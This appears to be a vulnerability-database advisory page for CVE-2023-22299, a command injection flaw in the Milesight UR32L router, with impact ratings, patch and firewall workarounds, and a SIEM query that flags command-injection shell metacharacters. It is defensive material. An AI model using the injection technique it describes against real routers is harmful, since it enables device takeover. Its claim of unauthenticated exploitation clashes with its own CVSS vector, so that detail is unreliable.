CVE-2023-22299 – This CVE describes an OS command injection vuln... (How to Fix)

Q: What is the severity of CVE-2023-22299?

CVE-2023-22299 has a CVSS score of 8.8 (HIGH). This CVE describes an OS command injection vulnerability in the Milesight UR32L router's vtysh_ubus _get_fw_logs functionality. Attackers can execute arbitrary commands by sending specially crafted network requests, potentially gaining full control of affected devices. Organizations using Milesight UR32L routers with vulnerable firmware are at risk.

📋 TL;DR

This CVE describes an OS command injection vulnerability in the Milesight UR32L router's vtysh_ubus _get_fw_logs functionality. Attackers can execute arbitrary commands by sending specially crafted network requests, potentially gaining full control of affected devices. Organizations using Milesight UR32L routers with vulnerable firmware are at risk.

💻 Affected Systems

Products:

Milesight UR32L

Versions: v32.3.0.5

Operating Systems: Embedded Linux

Default Config Vulnerable: ⚠️ Yes

Notes: Affects the vtysh_ubus component used for firewall log retrieval

📦 What is this software?

Ur32l Firmware by Milesight

View all CVEs affecting Ur32l Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise allowing attacker to install persistent backdoors, pivot to internal networks, exfiltrate data, or use device as botnet node

🟠

Likely Case

Unauthorized command execution leading to device configuration changes, network disruption, or credential harvesting

🟢

If Mitigated

Limited impact if network segmentation, strict firewall rules, and access controls prevent exploitation attempts

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires network access to the device but no authentication

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check vendor for latest firmware

Vendor Advisory: https://www.milesight.com/support/security-advisory/

Restart Required: Yes

Instructions:

1. Check current firmware version. 2. Download latest firmware from Milesight support portal. 3. Upload firmware via web interface. 4. Apply update and restart device.

🔧 Temporary Workarounds

Network Segmentation

all

Isolate UR32L devices from untrusted networks and restrict access to management interfaces

Firewall Rules

linux

Block external access to vulnerable service ports

iptables -A INPUT -p tcp --dport [management_port] -j DROP

🧯 If You Can't Patch

Implement strict network access controls to limit who can reach the device
Monitor for unusual network traffic patterns or command execution attempts

🔍 How to Verify

Check if Vulnerable:

Check firmware version via web interface or SSH: cat /etc/version

Check Version:

cat /etc/version

Verify Fix Applied:

Verify firmware version is updated beyond v32.3.0.5

📡 Detection & Monitoring

Log Indicators:

Unusual command execution in system logs
Multiple failed authentication attempts followed by successful access

Network Indicators:

Unexpected outbound connections from UR32L
Traffic to unusual ports from device

SIEM Query:

source="ur32l_logs" AND (command="*;*" OR command="*|*" OR command="*`*" OR command="*$(*")

📊 Metadata

CVE ID: CVE-2023-22299

CVSS v3 Score: 8.8 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-78

Published: July 6, 2023

Last Updated: November 21, 2024

🔗 References

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1712 Exploit,Third Party Advisory
https://talosintelligence.com/vulnerability_reports/TALOS-2023-1712 Exploit,Third Party Advisory
https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1712

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-22299, you might also want to check these: